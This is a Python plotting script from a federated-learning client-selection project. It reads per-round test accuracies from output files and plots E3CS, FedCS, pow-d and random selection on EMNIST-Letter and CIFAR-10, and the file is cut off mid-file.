| 14.875 | 39 | 0.705882 | 17 | 119 | 4.764706 | 0.647059 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151261 | 119 | 7 | 40 | 17 | 0.80198 | 0 | 0 | 0 | 0 | 0 | 0.033613 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
c14d3ba8ee9a635496f91eb73be1197731c2b1be | 37,600 | py | Python | makegraph.py | aviramlachmani/flsim-E3CS-impl | 8129f581dada4f20b8b2bfe66cf79d30b5d84677 | [
"Apache-2.0"
] | null | null | null | makegraph.py | aviramlachmani/flsim-E3CS-impl | 8129f581dada4f20b8b2bfe66cf79d30b5d84677 | [
"Apache-2.0"
] | null | null | null | makegraph.py | aviramlachmani/flsim-E3CS-impl | 8129f581dada4f20b8b2bfe66cf79d30b5d84677 | [
"Apache-2.0"
] | null | null | null | import os.path
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import numpy as np
def graph():
# graph EMNIST-Letter, iid, FedAvg-based
round_t = []
emnist_random_iid_a = [0] * 400
emnist_FedCS_iid_a = [0] * 400
emnist_pow_d_iid_a = [0] * 400
emnist_E3CS_0_iid_a = [0] * 400
emnist_E3CS_05_iid_a = [0] * 400
emnist_E3CS_08_iid_a = [0] * 400
emnist_E3CS_inc_iid_a = [0] * 400
if os.path.isfile("output_emnist_random_iid_a.txt"):
emnist_random_iid_a_file = open("output_emnist_random_iid_a.txt")
emnist_random_iid_a = []
with emnist_random_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_iid_a.append(float(line[3]) / 100)
round_t.append(int(line[1]))
else:
x += 1
if os.path.isfile("output_emnist_FedCS_iid_a.txt"):
emnist_FedCS_iid_a_file = open("output_emnist_FedCS_iid_a.txt")
emnist_FedCS_iid_a = []
with emnist_FedCS_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_iid_a.txt"):
emnist_pow_d_iid_a_file = open("output_emnist_pow-d_iid_a.txt")
emnist_pow_d_iid_a = []
with emnist_pow_d_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_iid_a.txt"):
emnist_E3CS_0_iid_a_file = open("output_emnist_E3CS_0_iid_a.txt")
emnist_E3CS_0_iid_a = []
with emnist_E3CS_0_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_iid_a.txt"):
emnist_E3CS_05_iid_a_file = open("output_emnist_E3CS_05_iid_a.txt")
emnist_E3CS_05_iid_a = []
with emnist_E3CS_05_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_iid_a.txt"):
emnist_E3CS_08_iid_a_file = open("output_emnist_E3CS_08_iid_a.txt")
emnist_E3CS_08_iid_a = []
with emnist_E3CS_08_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_iid_a.txt"):
emnist_E3CS_inc_iid_a_file = open("output_emnist_E3CS_inc_iid_a.txt")
emnist_E3CS_inc_iid_a = []
with emnist_E3CS_inc_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(1)
plt.plot(round_t, emnist_E3CS_0_iid_a, "pink")
plt.plot(round_t, emnist_E3CS_05_iid_a, 'b')
plt.plot(round_t, emnist_E3CS_08_iid_a, 'c')
plt.plot(round_t, emnist_E3CS_inc_iid_a, 'g')
plt.plot(round_t, emnist_FedCS_iid_a, 'y')
plt.plot(round_t, emnist_random_iid_a, 'orange')
plt.plot(round_t, emnist_pow_d_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph EMNIST-Letter, non-iid, FedAvg-based
round_t = []
emnist_random_non_iid_a = [0] * 400
emnist_FedCS_non_iid_a = [0] * 400
emnist_pow_d_non_iid_a = [0] * 400
emnist_E3CS_0_non_iid_a = [0] * 400
emnist_E3CS_05_non_iid_a = [0] * 400
emnist_E3CS_08_non_iid_a = [0] * 400
emnist_E3CS_inc_non_iid_a = [0] * 400
if os.path.isfile("output_emnist_random_non_iid_a.txt"):
emnist_random_non_iid_a_file = open("output_emnist_random_non_iid_a.txt")
emnist_random_non_iid_a = []
with emnist_random_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_non_iid_a.append(float(line[3]) / 100)
round_t.append(int(line[1]))
else:
x += 1
if os.path.isfile("output_emnist_FedCS_non_iid_a.txt"):
emnist_FedCS_non_iid_a_file = open("output_emnist_FedCS_non_iid_a.txt")
emnist_FedCS_non_iid_a = []
with emnist_FedCS_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_non_iid_a.txt"):
emnist_pow_d_non_iid_a_file = open("output_emnist_pow-d_non_iid_a.txt")
emnist_pow_d_non_iid_a = []
with emnist_pow_d_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_non_iid_a.txt"):
emnist_E3CS_0_non_iid_a_file = open("output_emnist_E3CS_0_non_iid_a.txt")
emnist_E3CS_0_non_iid_a = []
with emnist_E3CS_0_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_non_iid_a.txt"):
emnist_E3CS_05_non_iid_a_file = open("output_emnist_E3CS_05_non_iid_a.txt")
emnist_E3CS_05_non_iid_a = []
with emnist_E3CS_05_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_non_iid_a.txt"):
emnist_E3CS_08_non_iid_a_file = open("output_emnist_E3CS_08_non_iid_a.txt")
emnist_E3CS_08_non_iid_a = []
with emnist_E3CS_08_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_iid_a.txt"):
emnist_E3CS_inc_non_iid_a_file = open("output_emnist_E3CS_inc_iid_a.txt")
emnist_E3CS_inc_non_iid_a = []
with emnist_E3CS_inc_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(2)
plt.plot(round_t, emnist_E3CS_0_non_iid_a, "pink")
plt.plot(round_t, emnist_E3CS_05_non_iid_a, 'b')
plt.plot(round_t, emnist_E3CS_08_non_iid_a, 'c')
plt.plot(round_t, emnist_E3CS_inc_non_iid_a, 'g')
plt.plot(round_t, emnist_FedCS_non_iid_a, 'y')
plt.plot(round_t, emnist_random_non_iid_a, 'orange')
plt.plot(round_t, emnist_pow_d_non_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, non-iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph EMNIST-Letter, iid, FedProx-based
emnist_random_iid_p = [0] * 400
emnist_FedCS_iid_p = [0] * 400
emnist_pow_d_iid_p = [0] * 400
emnist_E3CS_0_iid_p = [0] * 400
emnist_E3CS_05_iid_p = [0] * 400
emnist_E3CS_08_iid_p = [0] * 400
emnist_E3CS_inc_iid_p = [0] * 400
if os.path.isfile("output_emnist_random_iid_p.txt"):
emnist_random_iid_p_file = open("output_emnist_random_iid_p.txt")
emnist_random_iid_p = []
with emnist_random_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_FedCS_iid_p.txt"):
emnist_FedCS_iid_p_file = open("output_emnist_FedCS_iid_p.txt")
emnist_FedCS_iid_p = []
with emnist_FedCS_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_iid_p.txt"):
emnist_pow_d_iid_p_file = open("output_emnist_pow-d_iid_p.txt")
emnist_pow_d_iid_p = []
with emnist_pow_d_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_iid_p.txt"):
emnist_E3CS_0_iid_p_file = open("output_emnist_E3CS_0_iid_p.txt")
emnist_E3CS_0_iid_p = []
with emnist_E3CS_0_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_iid_p.txt"):
emnist_E3CS_05_iid_p_file = open("output_emnist_E3CS_05_iid_p.txt")
emnist_E3CS_05_iid_p = []
with emnist_E3CS_05_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_iid_p.txt"):
emnist_E3CS_08_iid_p_file = open("output_emnist_E3CS_08_iid_p.txt")
emnist_E3CS_08_iid_p = []
with emnist_E3CS_08_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_iid_p.txt"):
emnist_E3CS_inc_iid_p_file = open("output_emnist_E3CS_inc_iid_p.txt")
emnist_E3CS_inc_iid_p = []
with emnist_E3CS_inc_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(3)
plt.plot(round_t, emnist_E3CS_0_iid_p, "pink")
plt.plot(round_t, emnist_E3CS_05_iid_p, 'b')
plt.plot(round_t, emnist_E3CS_08_iid_p, 'c')
plt.plot(round_t, emnist_E3CS_inc_iid_p, 'g')
plt.plot(round_t, emnist_FedCS_iid_p, 'y')
plt.plot(round_t, emnist_random_iid_p, 'orange')
plt.plot(round_t, emnist_pow_d_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph EMNIST-Letter, non-iid, FedProx-based
emnist_random_non_iid_p = [0] * 400
emnist_FedCS_non_iid_p = [0] * 400
emnist_pow_d_non_iid_p = [0] * 400
emnist_E3CS_0_non_iid_p = [0] * 400
emnist_E3CS_05_non_iid_p = [0] * 400
emnist_E3CS_08_non_iid_p = [0] * 400
emnist_E3CS_inc_non_iid_p = [0] * 400
if os.path.isfile("output_emnist_random_non_iid_p.txt"):
emnist_random_non_iid_p_file = open("output_emnist_random_non_iid_p.txt")
emnist_random_non_iid_p = []
with emnist_random_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_random_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_FedCS_non_iid_p.txt"):
emnist_FedCS_non_iid_p_file = open("output_emnist_FedCS_non_iid_p.txt")
emnist_FedCS_non_iid_p = []
with emnist_FedCS_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_FedCS_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_pow-d_non_iid_p.txt"):
emnist_pow_d_non_iid_p_file = open("output_emnist_pow-d_non_iid_p.txt")
emnist_pow_d_non_iid_p = []
with emnist_pow_d_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_pow_d_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_0_non_iid_p.txt"):
emnist_E3CS_0_non_iid_p_file = open("output_emnist_E3CS_0_non_iid_p.txt")
emnist_E3CS_0_non_iid_p = []
with emnist_E3CS_0_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_0_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_05_non_iid_p.txt"):
emnist_E3CS_05_non_iid_p_file = open("output_emnist_E3CS_05_non_iid_p.txt")
emnist_E3CS_05_non_iid_p = []
with emnist_E3CS_05_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_05_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_08_non_iid_p.txt"):
emnist_E3CS_08_non_iid_p_file = open("output_emnist_E3CS_08_non_iid_p.txt")
emnist_E3CS_08_non_iid_p = []
with emnist_E3CS_08_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_08_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_emnist_E3CS_inc_non_iid_p.txt"):
emnist_E3CS_inc_non_iid_p_file = open("output_emnist_E3CS_inc_non_iid_p.txt")
emnist_E3CS_inc_non_iid_p = []
with emnist_E3CS_inc_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
emnist_E3CS_inc_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(4)
plt.plot(round_t, emnist_E3CS_0_non_iid_p, "pink")
plt.plot(round_t, emnist_E3CS_05_non_iid_p, 'b')
plt.plot(round_t, emnist_E3CS_08_non_iid_p, 'c')
plt.plot(round_t, emnist_E3CS_inc_non_iid_p, 'g')
plt.plot(round_t, emnist_FedCS_non_iid_p, 'y')
plt.plot(round_t, emnist_random_non_iid_p, 'orange')
plt.plot(round_t, emnist_pow_d_non_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("EMNIST-Letter, non-iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar, iid, FedAvg-based
round_t = []
cifar_random_iid_a = [0] * 200
cifar_FedCS_iid_a = [0] * 200
cifar_pow_d_iid_a = [0] * 200
cifar_E3CS_0_iid_a = [0] * 200
cifar_E3CS_05_iid_a = [0] * 200
cifar_E3CS_08_iid_a = [0] * 200
cifar_E3CS_inc_iid_a = [0] * 200
if os.path.isfile("output_cifar_random_iid_a.txt"):
cifar_random_iid_a_file = open("output_cifar_random_iid_a.txt")
cifar_random_iid_a = []
with cifar_random_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_iid_a.append(float(line[3]) / 100)
round_t.append(int(line[1]))
else:
x += 1
if os.path.isfile("output_cifar_FedCS_iid_a.txt"):
cifar_FedCS_iid_a_file = open("output_cifar_FedCS_iid_a.txt")
cifar_FedCS_iid_a = []
with cifar_FedCS_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_iid_a.txt"):
cifar_pow_d_iid_a_file = open("output_cifar_pow-d_iid_a.txt")
cifar_pow_d_iid_a = []
with cifar_pow_d_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_iid_a.txt"):
cifar_E3CS_0_iid_a_file = open("output_cifar_E3CS_0_iid_a.txt")
cifar_E3CS_0_iid_a = []
with cifar_E3CS_0_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_iid_a.txt"):
cifar_E3CS_05_iid_a_file = open("output_cifar_E3CS_05_iid_a.txt")
cifar_E3CS_05_iid_a = []
with cifar_E3CS_05_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_iid_a.txt"):
cifar_E3CS_08_iid_a_file = open("output_cifar_E3CS_08_iid_a.txt")
cifar_E3CS_08_iid_a = []
with cifar_E3CS_08_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_iid_a.txt"):
cifar_E3CS_inc_iid_a_file = open("output_cifar_E3CS_inc_iid_a.txt")
cifar_E3CS_inc_iid_a = []
with cifar_E3CS_inc_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(5)
plt.plot(round_t, cifar_E3CS_0_iid_a, "pink")
plt.plot(round_t, cifar_E3CS_05_iid_a, 'b')
plt.plot(round_t, cifar_E3CS_08_iid_a, 'c')
plt.plot(round_t, cifar_E3CS_inc_iid_a, 'g')
plt.plot(round_t, cifar_FedCS_iid_a, 'y')
plt.plot(round_t, cifar_random_iid_a, 'orange')
plt.plot(round_t, cifar_pow_d_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar-Letter, non-iid, FedAvg-based
cifar_random_non_iid_a = [0] * 200
cifar_FedCS_non_iid_a = [0] * 200
cifar_pow_d_non_iid_a = [0] * 200
cifar_E3CS_0_non_iid_a = [0] * 200
cifar_E3CS_05_non_iid_a = [0] * 200
cifar_E3CS_08_non_iid_a = [0] * 200
cifar_E3CS_inc_non_iid_a = [0] * 200
if os.path.isfile("output_cifar_random_non_iid_a.txt"):
cifar_random_non_iid_a_file = open("output_cifar_random_non_iid_a.txt")
cifar_random_non_iid_a = []
with cifar_random_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_FedCS_non_iid_a.txt"):
cifar_FedCS_non_iid_a_file = open("output_cifar_FedCS_non_iid_a.txt")
cifar_FedCS_non_iid_a = []
with cifar_FedCS_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_non_iid_a.txt"):
cifar_pow_d_non_iid_a_file = open("output_cifar_pow-d_non_iid_a.txt")
cifar_pow_d_non_iid_a = []
with cifar_pow_d_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_non_iid_a.txt"):
cifar_E3CS_0_non_iid_a_file = open("output_cifar_E3CS_0_non_iid_a.txt")
cifar_E3CS_0_non_iid_a = []
with cifar_E3CS_0_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_non_iid_a.txt"):
cifar_E3CS_05_non_iid_a_file = open("output_cifar_E3CS_05_non_iid_a.txt")
cifar_E3CS_05_non_iid_a = []
with cifar_E3CS_05_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_non_iid_a.txt"):
cifar_E3CS_08_non_iid_a_file = open("output_cifar_E3CS_08_non_iid_a.txt")
cifar_E3CS_08_non_iid_a = []
with cifar_E3CS_08_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_non_iid_a.txt"):
cifar_E3CS_inc_non_iid_a_file = open("output_cifar_E3CS_inc_non_iid_a.txt")
cifar_E3CS_inc_non_iid_a = []
with cifar_E3CS_inc_non_iid_a_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_non_iid_a.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(6)
plt.plot(round_t, cifar_E3CS_0_non_iid_a, "pink")
plt.plot(round_t, cifar_E3CS_05_non_iid_a, 'b')
plt.plot(round_t, cifar_E3CS_08_non_iid_a, 'c')
plt.plot(round_t, cifar_E3CS_inc_non_iid_a, 'g')
plt.plot(round_t, cifar_FedCS_non_iid_a, 'y')
plt.plot(round_t, cifar_random_non_iid_a, 'orange')
plt.plot(round_t, cifar_pow_d_non_iid_a, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedAvg-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar, iid, Fedprox-based
cifar_random_iid_p = [0] * 200
cifar_FedCS_iid_p = [0] * 200
cifar_pow_d_iid_p = [0] * 200
cifar_E3CS_0_iid_p = [0] * 200
cifar_E3CS_05_iid_p = [0] * 200
cifar_E3CS_08_iid_p = [0] * 200
cifar_E3CS_inc_iid_p = [0] * 200
if os.path.isfile("output_cifar_random_iid_p.txt"):
cifar_random_iid_p_file = open("output_cifar_random_iid_p.txt")
cifar_random_iid_p = []
with cifar_random_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_FedCS_iid_p.txt"):
cifar_FedCS_iid_p_file = open("output_cifar_FedCS_iid_p.txt")
cifar_FedCS_iid_p = []
with cifar_FedCS_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_iid_p.txt"):
cifar_pow_d_iid_p_file = open("output_cifar_pow-d_iid_p.txt")
cifar_pow_d_iid_p = []
with cifar_pow_d_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_iid_p.txt"):
cifar_E3CS_0_iid_p_file = open("output_cifar_E3CS_0_iid_p.txt")
cifar_E3CS_0_iid_p = []
with cifar_E3CS_0_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_iid_p.txt"):
cifar_E3CS_05_iid_p_file = open("output_cifar_E3CS_05_iid_p.txt")
cifar_E3CS_05_iid_p = []
with cifar_E3CS_05_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_iid_p.txt"):
cifar_E3CS_08_iid_p_file = open("output_cifar_E3CS_08_iid_p.txt")
cifar_E3CS_08_iid_p = []
with cifar_E3CS_08_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_iid_p.txt"):
cifar_E3CS_inc_iid_p_file = open("output_cifar_E3CS_inc_iid_p.txt")
cifar_E3CS_inc_iid_p = []
with cifar_E3CS_inc_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_inc_iid_p.append(float(line[3]) / 100)
else:
x += 1
# make grahp
plt.figure(7)
plt.plot(round_t, cifar_E3CS_0_iid_p, "pink")
plt.plot(round_t, cifar_E3CS_05_iid_p, 'b')
plt.plot(round_t, cifar_E3CS_08_iid_p, 'c')
plt.plot(round_t, cifar_E3CS_inc_iid_p, 'g')
plt.plot(round_t, cifar_FedCS_iid_p, 'y')
plt.plot(round_t, cifar_random_iid_p, 'orange')
plt.plot(round_t, cifar_pow_d_iid_p, 'r')
plt.xlabel('Communication Rounds')
plt.ylabel('Test Accuracy')
plt.title("cifar-10, iid, FedProx-based")
plt.legend(["E3CS-0", "E3CS-05", "E3CS-08", "E3CS-inc", "FedCS", "Random", "pow-d"])
plt.show()
# graph cifar-Letter, non-iid, FedProx-based
cifar_random_non_iid_p = [0] * 200
cifar_FedCS_non_iid_p = [0] * 200
cifar_pow_d_non_iid_p = [0] * 200
cifar_E3CS_0_non_iid_p = [0] * 200
cifar_E3CS_05_non_iid_p = [0] * 200
cifar_E3CS_08_non_iid_p = [0] * 200
cifar_E3CS_inc_non_iid_p = [0] * 200
if os.path.isfile("output_cifar_random_non_iid_p.txt"):
cifar_random_non_iid_p_file = open("output_cifar_random_non_iid_p.txt")
cifar_random_non_iid_p = []
with cifar_random_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_random_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_FedCS_non_iid_p.txt"):
cifar_FedCS_non_iid_p_file = open("output_cifar_FedCS_non_iid_p.txt")
cifar_FedCS_non_iid_p = []
with cifar_FedCS_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_FedCS_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_pow-d_non_iid_p.txt"):
cifar_pow_d_non_iid_p_file = open("output_cifar_pow-d_non_iid_p.txt")
cifar_pow_d_non_iid_p = []
with cifar_pow_d_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_pow_d_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_0_non_iid_p.txt"):
cifar_E3CS_0_non_iid_p_file = open("output_cifar_E3CS_0_non_iid_p.txt")
cifar_E3CS_0_non_iid_p = []
with cifar_E3CS_0_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_0_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_05_non_iid_p.txt"):
cifar_E3CS_05_non_iid_p_file = open("output_cifar_E3CS_05_non_iid_p.txt")
cifar_E3CS_05_non_iid_p = []
with cifar_E3CS_05_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_05_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_08_non_iid_p.txt"):
cifar_E3CS_08_non_iid_p_file = open("output_cifar_E3CS_08_non_iid_p.txt")
cifar_E3CS_08_non_iid_p = []
with cifar_E3CS_08_non_iid_p_file as file:
lines = file.readlines()
x = 0
for line in lines:
if x == 1:
line = line.split()
cifar_E3CS_08_non_iid_p.append(float(line[3]) / 100)
else:
x += 1
if os.path.isfile("output_cifar_E3CS_inc_non_iid_p.txt"):
